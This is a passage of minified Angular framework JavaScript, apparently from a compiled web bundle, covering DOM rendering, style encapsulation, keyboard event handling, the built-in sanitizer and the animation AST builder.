Set;e.forEach(n=>{this._stylesSet.has(n)||(this._stylesSet.add(n),i.add(n))}),this.onStylesAdded(i)}onStylesAdded(e){}getAllStyles(){return Array.from(this._stylesSet)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),sy=(()=>{class t extends IP{constructor(e){super(),this._doc=e,this._hostNodes=new Map,this._hostNodes.set(e.head,[])}_addStylesToHost(e,i,n){e.forEach(r=>{const c=this._doc.createElement("style");c.textContent=r,n.push(i.appendChild(c))})}addHost(e){const i=[];this._addStylesToHost(this._stylesSet,e,i),this._hostNodes.set(e,i)}removeHost(e){const i=this._hostNodes.get(e);i&&i.forEach(RP),this._hostNodes.delete(e)}onStylesAdded(e){this._hostNodes.forEach((i,n)=>{this._addStylesToHost(e,n,i)})}ngOnDestroy(){this._hostNodes.forEach(e=>e.forEach(RP))}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function RP(t){su().remove(t)}const _6={svg:"http://www.w3.org/2000/svg",xhtml:"http://www.w3.org/1999/xhtml",xlink:"http://www.w3.org/1999/xlink",xml:"http://www.w3.org/XML/1998/namespace",xmlns:"http://www.w3.org/2000/xmlns/",math:"http://www.w3.org/1998/MathML/"},g6=/%COMP%/g;function o4(t,a,e){for(let i=0;i<a.length;i++){let n=a[i];Array.isArray(n)?o4(t,n,e):(n=n.replace(g6,t),e.push(n))}return e}function PP(t){return a=>{if("__ngUnwrap__"===a)return t;!1===t(a)&&(a.preventDefault(),a.returnValue=!1)}}let r4=(()=>{class t{constructor(e,i,n){this.eventManager=e,this.sharedStylesHost=i,this.appId=n,this.rendererByCompId=new Map,this.defaultRenderer=new C6(e)}createRenderer(e,i){if(!e||!i)return this.defaultRenderer;switch(i.encapsulation){case dc.Emulated:{let n=this.rendererByCompId.get(i.id);return n||(n=new Pse(this.eventManager,this.sharedStylesHost,i,this.appId),this.rendererByCompId.set(i.id,n)),n.applyToHost(e),n}case 1:case dc.ShadowDom:return new Ose(this.eventManager,this.sharedStylesHost,e,i);default:if(!this.rendererByCompId.has(i.id)){const n=o4(i.id,i.styles,[]);this.sharedStylesHost.addStyles(n),this.rendererByCompId.set(i.id,this.defaultRenderer)}return this.defaultRenderer}}begin(){}end(){}}return t.\u0275fac=function(e){return new(e||t)(At(n4),At(sy),At(h1))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class C6{constructor(a){this.eventManager=a,this.data=Object.create(null),this.destroyNode=null}destroy(){}createElement(a,e){return e?document.createElementNS(_6[e]||e,a):document.createElement(a)}createComment(a){return document.createComment(a)}createText(a){return document.createTextNode(a)}appendChild(a,e){(NP(a)?a.content:a).appendChild(e)}insertBefore(a,e,i){a&&(NP(a)?a.content:a).insertBefore(e,i)}removeChild(a,e){a&&a.removeChild(e)}selectRootElement(a,e){let i="string"==typeof a?document.querySelector(a):a;if(!i)throw new Error(`The selector "${a}" did not match any elements`);return e||(i.textContent=""),i}parentNode(a){return a.parentNode}nextSibling(a){return a.nextSibling}setAttribute(a,e,i,n){if(n){e=n+":"+e;const r=_6[n];r?a.setAttributeNS(r,e,i):a.setAttribute(e,i)}else a.setAttribute(e,i)}removeAttribute(a,e,i){if(i){const n=_6[i];n?a.removeAttributeNS(n,e):a.removeAttribute(`${i}:${e}`)}else a.removeAttribute(e)}addClass(a,e){a.classList.add(e)}removeClass(a,e){a.classList.remove(e)}setStyle(a,e,i,n){n&(Al.DashCase|Al.Important)?a.style.setProperty(e,i,n&Al.Important?"important":""):a.style[e]=i}removeStyle(a,e,i){i&Al.DashCase?a.style.removeProperty(e):a.style[e]=""}setProperty(a,e,i){a[e]=i}setValue(a,e){a.nodeValue=e}listen(a,e,i){return"string"==typeof a?this.eventManager.addGlobalEventListener(a,e,PP(i)):this.eventManager.addEventListener(a,e,PP(i))}}function NP(t){return"TEMPLATE"===t.tagName&&void 0!==t.content}class Pse extends C6{constructor(a,e,i,n){super(a),this.component=i;const r=o4(n+"-"+i.id,i.styles,[]);e.addStyles(r),this.contentAttr=function Rse(t){return"_ngcontent-%COMP%".replace(g6,t)}(n+"-"+i.id),this.hostAttr=function Sse(t){return"_nghost-%COMP%".replace(g6,t)}(n+"-"+i.id)}applyToHost(a){super.setAttribute(a,this.hostAttr,"")}createElement(a,e){const i=super.createElement(a,e);return super.setAttribute(i,this.contentAttr,""),i}}class Ose extends C6{constructor(a,e,i,n){super(a),this.sharedStylesHost=e,this.hostEl=i,this.shadowRoot=i.attachShadow({mode:"open"}),this.sharedStylesHost.addHost(this.shadowRoot);const r=o4(n.id,n.styles,[]);for(let c=0;c<r.length;c++){const d=document.createElement("style");d.textContent=r[c],this.shadowRoot.appendChild(d)}}nodeOrShadowRoot(a){return a===this.hostEl?this.shadowRoot:a}destroy(){this.sharedStylesHost.removeHost(this.shadowRoot)}appendChild(a,e){return super.appendChild(this.nodeOrShadowRoot(a),e)}insertBefore(a,e,i){return super.insertBefore(this.nodeOrShadowRoot(a),e,i)}removeChild(a,e){return super.removeChild(this.nodeOrShadowRoot(a),e)}parentNode(a){return this.nodeOrShadowRoot(super.parentNode(this.nodeOrShadowRoot(a)))}}let Nse=(()=>{class t extends wP{constructor(e){super(e)}supports(e){return!0}addEventListener(e,i,n){return e.addEventListener(i,n,!1),()=>this.removeEventListener(e,i,n)}removeEventListener(e,i,n){return e.removeEventListener(i,n)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const LP=["alt","control","meta","shift"],Lse={"\b":"Backspace","\t":"Tab","\x7f":"Delete","\x1b":"Escape",Del:"Delete",Esc:"Escape",Left:"ArrowLeft",Right:"ArrowRight",Up:"ArrowUp",Down:"ArrowDown",Menu:"ContextMenu",Scroll:"ScrollLock",Win:"OS"},zse={alt:t=>t.altKey,control:t=>t.ctrlKey,meta:t=>t.metaKey,shift:t=>t.shiftKey};let Wse=(()=>{class t extends wP{constructor(e){super(e)}supports(e){return null!=t.parseEventName(e)}addEventListener(e,i,n){const r=t.parseEventName(i),c=t.eventCallback(r.fullKey,n,this.manager.getZone());return this.manager.getZone().runOutsideAngular(()=>su().onAndCancel(e,r.domEventName,c))}static parseEventName(e){const i=e.toLowerCase().split("."),n=i.shift();if(0===i.length||"keydown"!==n&&"keyup"!==n)return null;const r=t._normalizeKey(i.pop());let c="",d=i.indexOf("code");if(d>-1&&(i.splice(d,1),c="code."),LP.forEach(k=>{const q=i.indexOf(k);q>-1&&(i.splice(q,1),c+=k+".")}),c+=r,0!=i.length||0===r.length)return null;const T={};return T.domEventName=n,T.fullKey=c,T}static matchEventFullKeyCode(e,i){let n=Lse[e.key]||e.key,r="";return i.indexOf("code.")>-1&&(n=e.code,r="code."),!(null==n||!n)&&(n=n.toLowerCase()," "===n?n="space":"."===n&&(n="dot"),LP.forEach(c=>{c!==n&&(0,zse[c])(e)&&(r+=c+".")}),r+=n,r===i)}static eventCallback(e,i,n){return r=>{t.matchEventFullKeyCode(r,e)&&n.runGuarded(()=>i(r))}}static _normalizeKey(e){return"esc"===e?"escape":e}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const Hse=P9(Loe,"browser",[{provide:lm,useValue:MP},{provide:A9,useValue:function Fse(){p6.makeCurrent()},multi:!0},{provide:ga,useFactory:function Bse(){return function aE(t){U_=t}(document),document},deps:[]}]),FP=new ni(""),VP=[{provide:zv,useClass:class Dse{addToWindow(a){vo.getAngularTestability=(i,n=!0)=>{const r=a.findTestabilityInTree(i,n);if(null==r)throw new Error("Could not find testability for element.");return r},vo.getAllAngularTestabilities=()=>a.getAllTestabilities(),vo.getAllAngularRootElements=()=>a.getAllRootElements(),vo.frameworkStabilizers||(vo.frameworkStabilizers=[]),vo.frameworkStabilizers.push(i=>{const n=vo.getAllAngularTestabilities();let r=n.length,c=!1;const d=function(T){c=c||T,r--,0==r&&i(c)};n.forEach(function(T){T.whenStable(d)})})}findTestabilityInTree(a,e,i){if(null==e)return null;const n=a.getTestability(e);return null!=n?n:i?su().isShadowRoot(e)?this.findTestabilityInTree(a,e.host,!0):this.findTestabilityInTree(a,e.parentElement,!0):null}},deps:[]},{provide:I9,useClass:HD,deps:[qi,UD,zv]},{provide:HD,useClass:HD,deps:[qi,UD,zv]}],BP=[{provide:dt,useValue:"root"},{provide:yh,useFactory:function Vse(){return new yh},deps:[]},{provide:a4,useClass:Nse,multi:!0,deps:[ga,qi,lm]},{provide:a4,useClass:Wse,multi:!0,deps:[ga]},{provide:r4,useClass:r4,deps:[n4,sy,h1]},{provide:qs,useExisting:r4},{provide:IP,useExisting:sy},{provide:sy,useClass:sy,deps:[ga]},{provide:n4,useClass:n4,deps:[a4,qi]},{provide:AP,useClass:xse,deps:[]},[]];let HP=(()=>{class t{constructor(e){}static withServerTransition(e){return{ngModule:t,providers:[{provide:h1,useValue:e.appId},{provide:xP,useExisting:h1},Ese]}}}return t.\u0275fac=function(e){return new(e||t)(At(FP,12))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[...BP,...VP],imports:[rn,zoe]}),t})(),UP=(()=>{class t{constructor(e){this._doc=e}getTitle(){return this._doc.title}setTitle(e){this._doc.title=e||""}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new e:function qse(){return new UP(At(ga))}(),i},providedIn:"root"}),t})();"undefined"!=typeof window&&window;let cy=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new(e||t):At(jP),i},providedIn:"root"}),t})(),jP=(()=>{class t extends cy{constructor(e){super(),this._doc=e}sanitize(e,i){if(null==i)return null;switch(e){case oo.NONE:return i;case oo.HTML:return Fi(i,"HTML")?Bc(i):iv(this._doc,String(i)).toString();case oo.STYLE:return Fi(i,"Style")?Bc(i):i;case oo.SCRIPT:if(Fi(i,"Script"))return Bc(i);throw new Error("unsafe value used in a script context");case oo.URL:return Fi(i,"URL")?Bc(i):B0(String(i));case oo.RESOURCE_URL:if(Fi(i,"ResourceURL"))return Bc(i);throw new Error("unsafe value used in a resource URL context (see https://g.co/ng/security#xss)");default:throw new Error(`Unexpected SecurityContext ${e} (see https://g.co/ng/security#xss)`)}}bypassSecurityTrustHtml(e){return function W0(t){return new oE(t)}(e)}bypassSecurityTrustStyle(e){return function Ml(t){return new rE(t)}(e)}bypassSecurityTrustScript(e){return function cE(t){return new IC(t)}(e)}bypassSecurityTrustUrl(e){return function Io(t){return new sE(t)}(e)}bypassSecurityTrustResourceUrl(e){return function hr(t){return new RC(t)}(e)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new e:function Yse(t){return new jP(t.get(ga))}(At(Ko)),i},providedIn:"root"}),t})();class QP{}const wh="*";function ar(t,a){return{type:7,name:t,definitions:a,options:{}}}function En(t,a=null){return{type:4,styles:a,timings:t}}function $P(t,a=null){return{type:3,steps:t,options:a}}function KP(t,a=null){return{type:2,steps:t,options:a}}function zi(t){return{type:6,styles:t,offset:null}}function sn(t,a,e){return{type:0,name:t,styles:a,options:e}}function og(t){return{type:5,steps:t}}function gn(t,a,e=null){return{type:1,expr:t,animation:a,options:e}}function s4(t=null){return{type:9,options:t}}function c4(t,a,e=null){return{type:11,selector:t,animation:a,options:e}}function XP(t){Promise.resolve().then(t)}class ly{constructor(a=0,e=0){this._onDoneFns=[],this._onStartFns=[],this._onDestroyFns=[],this._originalOnDoneFns=[],this._originalOnStartFns=[],this._started=!1,this._destroyed=!1,this._finished=!1,this._position=0,this.parentPlayer=null,this.totalTime=a+e}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}onStart(a){this._originalOnStartFns.push(a),this._onStartFns.push(a)}onDone(a){this._originalOnDoneFns.push(a),this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}hasStarted(){return this._started}init(){}play(){this.hasStarted()||(this._onStart(),this.triggerMicrotask()),this._started=!0}triggerMicrotask(){XP(()=>this._onFinish())}_onStart(){this._onStartFns.forEach(a=>a()),this._onStartFns=[]}pause(){}restart(){}finish(){this._onFinish()}destroy(){this._destroyed||(this._destroyed=!0,this.hasStarted()||this._onStart(),this.finish(),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}reset(){this._started=!1,this._finished=!1,this._onStartFns=this._originalOnStartFns,this._onDoneFns=this._originalOnDoneFns}setPosition(a){this._position=this.totalTime?a*this.totalTime:1}getPosition(){return this.totalTime?this._position/this.totalTime:1}triggerCallback(a){const e="start"==a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}class YP{constructor(a){this._onDoneFns=[],this._onStartFns=[],this._finished=!1,this._started=!1,this._destroyed=!1,this._onDestroyFns=[],this.parentPlayer=null,this.totalTime=0,this.players=a;let e=0,i=0,n=0;const r=this.players.length;0==r?XP(()=>this._onFinish()):this.players.forEach(c=>{c.onDone(()=>{++e==r&&this._onFinish()}),c.onDestroy(()=>{++i==r&&this._onDestroy()}),c.onStart(()=>{++n==r&&this._onStart()})}),this.totalTime=this.players.reduce((c,d)=>Math.max(c,d.totalTime),0)}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}init(){this.players.forEach(a=>a.init())}onStart(a){this._onStartFns.push(a)}_onStart(){this.hasStarted()||(this._started=!0,this._onStartFns.forEach(a=>a()),this._onStartFns=[])}onDone(a){this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}hasStarted(){return this._started}play(){this.parentPlayer||this.init(),this._onStart(),this.players.forEach(a=>a.play())}pause(){this.players.forEach(a=>a.pause())}restart(){this.players.forEach(a=>a.restart())}finish(){this._onFinish(),this.players.forEach(a=>a.finish())}destroy(){this._onDestroy()}_onDestroy(){this._destroyed||(this._destroyed=!0,this._onFinish(),this.players.forEach(a=>a.destroy()),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}reset(){this.players.forEach(a=>a.reset()),this._destroyed=!1,this._finished=!1,this._started=!1}setPosition(a){const e=a*this.totalTime;this.players.forEach(i=>{const n=i.totalTime?Math.min(1,e/i.totalTime):1;i.setPosition(n)})}getPosition(){const a=this.players.reduce((e,i)=>null===e||i.totalTime>e.totalTime?i:e,null);return null!=a?a.getPosition():0}beforeDestroy(){this.players.forEach(a=>{a.beforeDestroy&&a.beforeDestroy()})}triggerCallback(a){const e="start"==a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}var JP=de(5486);function ZP(t){return new gi(3e3,!1)}function Pce(){return"undefined"!=typeof window&&void 0!==window.document}function v6(){return void 0!==JP&&"[object process]"==={}.toString.call(JP)}function tp(t){switch(t.length){case 0:return new ly;case 1:return t[0];default:return new YP(t)}}function eO(t,a,e,i,n=new Map,r=new Map){const c=[],d=[];let T=-1,k=null;if(i.forEach(q=>{const Y=q.get("offset"),te=Y==T,pe=te&&k||new Map;q.forEach((Re,Fe)=>{let Ne=Fe,et=Re;if("offset"!==Fe)switch(Ne=a.normalizePropertyName(Ne,c),et){case"!":et=n.get(Fe);break;case wh:et=r.get(Fe);break;default:et=a.normalizeStyleValue(Fe,Ne,et,c)}pe.set(Ne,et)}),te||d.push(pe),k=pe,T=Y}),c.length)throw function Mce(t){return new gi(3502,!1)}();return d}function A6(t,a,e,i){switch(a){case"start":t.onStart(()=>i(e&&T6(e,"start",t)));break;case"done":t.onDone(()=>i(e&&T6(e,"done",t)));break;case"destroy":t.onDestroy(()=>i(e&&T6(e,"destroy",t)))}}function T6(t,a,e){const i=e.totalTime,r=E6(t.element,t.triggerName,t.fromState,t.toState,a||t.phaseName,null==i?t.totalTime:i,!!e.disabled),c=t._data;return null!=c&&(r._data=c),r}function E6(t,a,e,i,n="",r=0,c){return{element:t,triggerName:a,fromState:e,toState:i,phaseName:n,totalTime:r,disabled:!!c}}function Gl(t,a,e){let i=t.get(a);return i||t.set(a,i=e),i}function tO(t){const a=t.indexOf(":");return[t.substring(1,a),t.slice(a+1)]}let D6=(t,a)=>!1,iO=(t,a,e)=>[],aO=null;function x6(t){const a=t.parentNode||t.host;return a===aO?null:a}(v6()||"undefined"!=typeof Element)&&(Pce()?(aO=(()=>document.documentElement)(),D6=(t,a)=>{for(;a;){if(a===t)return!0;a=x6(a)}return!1}):D6=(t,a)=>t.contains(a),iO=(t,a,e)=>{if(e)return Array.from(t.querySelectorAll(a));const i=t.querySelector(a);return i?[i]:[]});let rg=null,nO=!1;const oO=D6,rO=iO;let sO=(()=>{class t{validateStyleProperty(e){return function Nce(t){rg||(rg=function Lce(){return"undefined"!=typeof document?document.body:null}()||{},nO=!!rg.style&&"WebkitAppearance"in rg.style);let a=!0;return rg.style&&!function Oce(t){return"ebkit"==t.substring(1,6)}(t)&&(a=t in rg.style,!a&&nO&&(a="Webkit"+t.charAt(0).toUpperCase()+t.slice(1)in rg.style)),a}(e)}matchesElement(e,i){return!1}containsElement(e,i){return oO(e,i)}getParentElement(e){return x6(e)}query(e,i,n){return rO(e,i,n)}computeStyle(e,i,n){return n||""}animate(e,i,n,r,c,d=[],T){return new ly(n,r)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),w6=(()=>{class t{}return t.NOOP=new sO,t})();const I6="ng-enter",l4="ng-leave",d4="ng-trigger",m4=".ng-trigger",lO="ng-animating",R6=".ng-animating";function Ih(t){if("number"==typeof t)return t;const a=t.match(/^(-?[\.\d]+)(m?s)/);return!a||a.length<2?0:S6(parseFloat(a[1]),a[2])}function S6(t,a){return"s"===a?1e3*t:t}function u4(t,a,e){return t.hasOwnProperty("duration")?t:function Fce(t,a,e){let n,r=0,c="";if("string"==typeof t){const d=t.match(/^(-?[\.\d]+)(m?s)(?:\s+(-?[\.\d]+)(m?s))?(?:\s+([-a-z]+(?:\(.+?\))?))?$/i);if(null===d)return a.push(ZP()),{duration:0,delay:0,easing:""};n=S6(parseFloat(d[1]),d[2]);const T=d[3];null!=T&&(r=S6(parseFloat(T),d[4]));const k=d[5];k&&(c=k)}else n=t;if(!e){let d=!1,T=a.length;n<0&&(a.push(function Zse(){return new gi(3100,!1)}()),d=!0),r<0&&(a.push(function ece(){return new gi(3101,!1)}()),d=!0),d&&a.splice(T,0,ZP())}return{duration:n,delay:r,easing:c}}(t,a,e)}function dy(t,a={}){return Object.keys(t).forEach(e=>{a[e]=t[e]}),a}function dO(t){const a=new Map;return Object.keys(t).forEach(e=>{a.set(e,t[e])}),a}function ip(t,a=new Map,e){if(e)for(let[i,n]of e)a.set(i,n);for(let[i,n]of t)a.set(i,n);return a}function uO(t,a,e){return e?a+":"+e+";":""}function hO(t){let a="";for(let e=0;e<t.style.length;e++){const i=t.style.item(e);a+=uO(0,i,t.style.getPropertyValue(i))}for(const e in t.style)t.style.hasOwnProperty(e)&&!e.startsWith("_")&&(a+=uO(0,Uce(e),t.style[e]));t.setAttribute("style",a)}function cu(t,a,e){t.style&&(a.forEach((i,n)=>{const r=P6(n);e&&!e.has(n)&&e.set(n,t.style[r]),t.style[r]=i}),v6()&&hO(t))}function sg(t,a){t.style&&(a.forEach((e,i)=>{const n=P6(i);t.style[n]=""}),v6()&&hO(t))}function my(t){return Array.isArray(t)?1==t.length?t[0]:KP(t):t}const k6=new RegExp("{{\\s*(.+?)\\s*}}","g");function fO(t){let a=[];if("string"==typeof t){let e;for(;e=k6.exec(t);)a.push(e[1]);k6.lastIndex=0}return a}function uy(t,a,e){const i=t.toString(),n=i.replace(k6,(r,c)=>{let d=a[c];return null==d&&(e.push(function ice(t){return new gi(3003,!1)}()),d=""),d.toString()});return n==i?t:n}function h4(t){const a=[];let e=t.next();for(;!e.done;)a.push(e.value),e=t.next();return a}const Hce=/-+([a-z0-9])/g;function P6(t){return t.replace(Hce,(...a)=>a[1].toUpperCase())}function Uce(t){return t.replace(/([a-z])([A-Z])/g,"$1-$2").toLowerCase()}function jl(t,a,e){switch(a.type){case 7:return t.visitTrigger(a,e);case 0:return t.visitState(a,e);case 1:return t.visitTransition(a,e);case 2:return t.visitSequence(a,e);case 3:return t.visitGroup(a,e);case 4:return t.visitAnimate(a,e);case 5:return t.visitKeyframes(a,e);case 6:return t.visitStyle(a,e);case 8:return t.visitReference(a,e);case 9:return t.visitAnimateChild(a,e);case 10:return t.visitAnimateRef(a,e);case 11:return t.visitQuery(a,e);case 12:return t.visitStagger(a,e);default:throw function ace(t){return new gi(3004,!1)}()}}function pO(t,a){return window.getComputedStyle(t)[a]}function Kce(t,a){const e=[];return"string"==typeof t?t.split(/\s*,\s*/).forEach(i=>function Xce(t,a,e){if(":"==t[0]){const T=function Yce(t,a){switch(t){case":enter":return"void => *";case":leave":return"* => void";case":increment":return(e,i)=>parseFloat(i)>parseFloat(e);case":decrement":return(e,i)=>parseFloat(i)<parseFloat(e);default:return a.push(function gce(t){return new gi(3016,!1)}()),"* => *"}}(t,e);if("function"==typeof T)return void a.push(T);t=T}const i=t.match(/^(\*|[-\w]+)\s*(<?[=-]>)\s*(\*|[-\w]+)$/);if(null==i||i.length<4)return e.push(function _ce(t){return new gi(3015,!1)}()),a;const n=i[1],r=i[2],c=i[3];a.push(_O(n,c));"<"==r[0]&&!("*"==n&&"*"==c)&&a.push(_O(c,n))}(i,e,a)):e.push(t),e}const g4=new Set(["true","1"]),C4=new Set(["false","0"]);function _O(t,a){const e=g4.has(t)||C4.has(t),i=g4.has(a)||C4.has(a);return(n,r)=>{let c="*"==t||t==n,d="*"==a||a==r;return!c&&e&&"boolean"==typeof n&&(c=n?g4.has(t):C4.has(t)),!d&&i&&"boolean"==typeof r&&(d=r?g4.has(a):C4.has(a)),c&&d}}const Jce=new RegExp("s*:selfs*,?","g");function O6(t,a,e,i){return new Zce(t).build(a,e,i)}class Zce{constructor(a){this._driver=a}build(a,e,i){const n=new ile(e);return this._resetContextStyleTimingState(n),jl(this,my(a),n)}_resetContextStyleTimingState(a){a.currentQuerySelector="",a.collectedStyles=new Map,a.collectedStyles.set("",new Map),a.currentTime=0}visitTrigger(a,e){let i=e.queryCount=0,n=e.depCount=0;const r=[],c=[];return"@"==a.name.charAt(0)&&e.errors.push(function oce(){return new gi(3006,!1)}()),a.definitions.forEach(d=>{if(this._resetContextStyleTimingState(e),0==d.type){const T=d,k=T.name;k.toString().split(/\s*,\s*/).forEach(q=>{T.name=q,r.push(this.visitState(T,e))}),T.name=k}else if(1==d.type){const T=this.visitTransition(d,e);i+=T.queryCount,n+=T.depCount,c.push(T)}else e.errors.push(function rce(){return new gi(3007,!1)}())}),{type:7,name:a.name,states:r,transitions:c,queryCount:i,depCount:n,options:null}}visitState(a,e){const i=this.visitStyle(a.styles,e),n=a.options&&a.options.params||null;if(i.containsDynamicStyles){const r=new Set,c=n||{};i.styles.forEach(d=>{d instanceof Map&&d.forEach(T=>{fO(T).forEach(k=>{c.hasOwnProperty(k)||r.add(k)})})}),r.size&&(h4(r.values()),e.errors.push(function sce(t,a){return new gi(3008,!1)}()))}return{type:0,name:a.name,style:i,options:n?{params:n}:null}}visitTransition(a,e){e.queryCount=0,e.depCount=0;const i=jl(this,my(a.animation),e);return{type:1,matchers:Kce(a.expr,e.errors),animation:i,queryCount:e.queryCount,depCount:e.depCount,options:cg(a.options)}}visitSequence(a,e){return{type:2,steps:a.steps.map(i=>jl(this,i,e)),options:cg(a.options)}}visitGroup(a,e){const i=e.currentTime;let n=0;const r=a.steps.map(c=>{e.currentTime=i;const d=jl(this,c,e);return n=Math.max(n,e.currentTime),d});return e.currentTime=n,{type:3,steps:r,options:cg(a.options)}}visitAnimate(a,e){const i=function nle(t,a){if(t.hasOwnProperty("duration"))return t;if("number"==typeof t)return N6(u4(t,a).duration,0,"");const e=t;if(e.split(/\s+/).some(r=>"{"==r.charAt(0)&&"{"==r.charAt(1))){const r=N6(0,0,"");return r.dynamic=!0,r.strValue=e,r}const n=u4(e,a);return N6(n.duration,n.delay,n.easing)}(a.timings,e.errors);e.currentAnimateTimings=i;let n,r=a.styles?a.styles:zi({});if(5==r.type)n=this.visitKeyframes(r,e);else{let c=a.styles,d=!1;if(!c){d=!0;const k={};i.easing&&(k.easing=i.easing),c=zi(k)}e.currentTime+=i.duration+i.delay;const T=this.visitStyle(c,e);T.isEmptyStep=d,n=T}return e.currentAnimateTimings=null,{type:4,timings:i,style:n,options:null}}visitStyle(a,e){const i=this._makeStyleAst(a,e);return this._validateStyleAst(i,e),i}_makeStyleAst(a,e){const i=[],n=Array.isArray(a.styles)?a.styles:[a.styles];for(let d of n)"string"==typeof d?d===wh?i.push(d):e.errors.push(new gi(3002,!1)):i.push(dO(d));let r=!1,c=null;return i.forEach(d=>{if(d instanceof Map&&(d.has("easing")&&(c=d.get("easing"),d.delete("easing")),!r))for(let T of d.values())if(T.toString().indexOf("{{")>=0){r=!0;break}}),{type:6,styles:i,easing:c,offset:a.offset,containsDynamicStyles:r,options:null}}_validateStyleAst(a,e){const i=e.currentAnimateTimings;let n=e.currentTime,r=e.currentTime;i&&r>0&&(r-=i.duration+i.delay),a.styles.forEach(c=>{"string"!=typeof c&&c.forEach((d,T)=>{const k=e.collectedStyles.get(e.currentQuerySelector),q=k.get(T);let Y=!0;q&&(r!=n&&r>=q.startTime&&n<=q.endTime&&(e.errors.push(function lce(t,a,e,i,n){return new gi(3010,!1)}()),Y=!1),r=q.startTime),Y&&k.set(T,{startTime:r,endTime:n}),e.options&&function Bce(t,a,e){const i=a.params||{},n=fO(t);n.length&&n.forEach(r=>{i.hasOwnProperty(r)||e.push(function tce(t){return new gi(3001,!1)}())})}(d,e.options,e.errors)})})}visitKeyframes(a,e){const i={type:5,styles:[],options:null};if(!e.currentAnimateTimings)return e.errors.push(function dce(){return new gi(3011,!1)}()),i;let r=0;const c=[];let d=!1,T=!1,k=0;const q=a.steps.map(et=>{const ut=this._makeStyleAst(et,e);let Ze=null!=ut.offset?ut.offset:function ale(t){if("string"==typeof t)return null;let a=null;if(Array.isArray(t))t.forEach(e=>{if(e instanceof Map&&e.has("offset")){const i=e;a=parseFloat(i.get("offset")),i.delete("offset")}});else if(t instanceof Map&&t.has("offset")){const e=t;a=parseFloat(e.get("offset")),e.delete("offset")}return a}(ut.styles),yt=0;return null!=Ze&&(r++,yt=ut.offset=Ze),T=T||yt<0||yt>1,d=d||yt<k,k=yt,c.push(yt),ut});T&&e.errors.push(function mce(){return new gi(3012,!1)}()),d&&e.errors.push(function uce(){return new gi(3200,!1)}());const Y=a.steps.length;let te=0;r>0&&r<Y?e.errors.push(function hce(){return new gi(3202,!1)}()):0==r&&(te=1/(Y-1));const pe=Y-1,Re=e.currentTime,Fe=e.currentAnimateTimings,Ne=Fe.duration;return q.forEach((et,ut)=>{const Ze=te>0?ut==pe?1:te*ut:c[ut],yt=Ze*Ne;e.currentTime=Re+Fe.delay+yt,Fe.duration=yt,this._validateStyleAst(et,e),et.offset=Ze,i.styles.push(et)}),i}visitReference(a,e){return{type:8,animation:jl(this,my(a.animation),e),options:cg(a.options)}}visitAnimateChild(a,e){return e.depCount++,{type:9,options:cg(a.options)}}visitAnimateRef(a,e){return{type:10,animation:this.visitReference(a.animation,e),options:cg(a.options)}}visitQuery(a,e){const i=e.currentQuerySelector,n=a.options||{};e.queryCount++,e.currentQuery=a;const[r,c]=function ele(t){const a=!!t.split(/\s*,\s*/).find(e=>":self"==e);return a&&(t=t.replace(Jce,"")),t=t.replace(/@\*/g,m4).replace(/@\w+/g,e=>m4+"-"+e.slice(1)).replace(/:animating/g,R6),[t,a]}(a.selector);e.currentQuerySelector=i.length?i+" "+r:r,Gl(e.collectedStyles,e.currentQuerySelector,new Map);const d=jl(this,my(a.animation),e);return e.currentQuery=null,e.currentQuerySelector=i,{type:11,selector:r,limit:n.limit||0,optional:!!n.optional,includeSelf:c,animation:d,originalSelector:a.selector,options:cg(a.options)}}visitStagger(a,e){e.currentQuery||e.errors.push(function fce(){return new gi(3013,!1)}());const i="full"===a.timings?{duration:0,delay:0,easing:"full"}:u4(a.timings,e.errors,!0);return{type:12,animation:jl(this,my(a.animation),e),timings:i,options:null}}}class ile{constructor(a){this.errors=a,this.queryCount=0,this.depCount=0,this.currentTransition=null,this.currentQuery=null,this.currentQuerySelector=null,this.currentAnimateTimings=null,this.currentTime=0,this.collectedStyles=new Map,this.options=null,this.unsupportedCSSPropertiesFound=new Set}}function cg(t){return t?(t=dy(t)).params&&(t.params=function tle(t){return t?dy(t):null}(t.params)):t={},t}function N6(t,a,e){return{duration:t,delay:a,easing:e}}function L6(t,a,e,i,n,r,c=null,d=!1){return{type:1,element:t,keyframes:a,preStyleProps:e,postStyleProps:i,duration:n,delay:r,totalTime:n+r,easing:c,subTimeline:d}}class y4{constructor(){this._map=new Map}get(a){return this._map.get(a)||[]}append(a,e){let i=this._map.get(a);i||this._map.set(a,i=[]),i.push(...e)}has(a){return this._map.has(a)}clear(){this._map.clear()}}const sle=new RegExp(":enter","g"),lle=new RegExp(":leave","g");function z6(t,a,e,i,n,r=new Map,c=new Map,d,T,k=[]){return(new dle).buildKeyframes(t,a,e,i,n,r,c,d,T,k)}class dle{buildKeyframes(a,e,i,n,r,c,d,T,k,q=[]){k=k||new y4;const Y=new W6(a,e,k,n,r,q,[]);Y.options=T;const te=T.delay?Ih(T.delay):0;Y.currentTimeline.delayNextStep(te),Y.currentTimeline.setStyles([c],null,Y.errors,T),jl(this,i,Y);const pe=Y.timelines.filter(Re=>Re.containsAnimation());if(pe.length&&d.size){let Re;for(let 